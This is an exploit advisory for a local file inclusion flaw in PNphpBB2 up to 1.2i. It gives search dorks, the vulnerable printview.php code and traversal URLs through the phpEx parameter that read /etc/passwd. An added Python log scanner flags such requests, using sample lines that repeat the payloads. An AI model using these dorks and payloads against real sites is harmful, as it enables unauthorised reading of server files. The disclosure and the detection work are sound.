PNphpBB2 < 1.2i - 'phpEx' Local File Inclusion

Author: irk4z
type: webapps
platform: php
date_added: 2007-12-25  
date_updated: 2017-01-12  
verified: 1  
codes: OSVDB-39879;CVE-2007-6624  
application_url: http://www.exploit-db.comPNphpBB2_1.2i.zip  

raw file: 4796.txt  
.-----------------------------------------------------------------------------.
|  vuln.: PNphpBB2 <= 1.2i (printview.php phpEx) Local File Inclusion Vuln.   |
|  download: http://www.pnphpbb.com/                                          |
|  dorks: Powered by PNphpBB2 / Powered por PNphpBB2                          |
|         inurl:"index.php?name=PNphpBB2"                                     |
|                                                                             |
|  author: irk4z@yahoo.pl                                                     |
|  homepage: http://irk4z.wordpress.com/                                      |
|                                                                             |
|  greets to: str0ke, wacky, polish under ;]                                  |
'-----------------------------------------------------------------------------'

# code:

  /printview.php:
  ...
      define('IN_PHPBB', true);
      $ModName = basename( dirname( __FILE__ ) );
      $phpbb_root_path = './modules/' . $ModName . '/';
      include($phpbb_root_path . 'extension.inc');
      include($phpbb_root_path . 'common.'.$phpEx);
  ...

  LFI in $phpEx :D:D:D

# sploit:

http://[host]/[path]/modules/PNphpBB2/printview.php?phpEx=/../../../../../../../etc/passwd
http://[host]/[path]/modules/PNphpBB2/printview.php?phpEx=[ LFI ]

# milw0rm.com [2007-12-26]
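
Added example, not part of the original advisory: a log check that flags requests to printview.php whose phpEx parameter is anything other than a bare file extension, including percent-encoded and double-encoded values. Assumptions: a combined-format web access log, and that the only legitimate phpEx value is a short alphanumeric extension such as "php"; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumption: a legitimate phpEx value is a bare extension such as "php".
SAFE_PHPEX = re.compile(r"[A-Za-z0-9]{1,5}")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP addresses, invented sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Dec/2007:10:00:01 +0000] "GET /modules/PNphpBB2/printview.php?t=42 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [26/Dec/2007:10:00:05 +0000] "GET /modules/PNphpBB2/printview.php?phpEx=/../../../../../../../etc/passwd HTTP/1.1" 200 1432',
    '192.0.2.12 - - [26/Dec/2007:10:00:09 +0000] "GET /modules/PNphpBB2/printview.php?phpEx=%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1432',
    '192.0.2.13 - - [26/Dec/2007:10:00:12 +0000] "GET /index.php?name=PNphpBB2&file=viewtopic HTTP/1.1" 200 9001',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (%252f -> %2f -> /)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_phpex(log_line):
    """Return the decoded phpEx value if it is not a bare extension, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/printview.php"):
        return None
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        # "phpEx[]=..." also populates the variable, so compare the base name.
        if key.split("[")[0] == "phpEx":
            value = fully_decode(value)
            if not SAFE_PHPEX.fullmatch(value):
                return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_phpex(line)
        if value is not None:
            hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: phpEx={value!r}")
```

A 200 response with an unusual body size on a flagged line is worth checking against the file named in the decoded value.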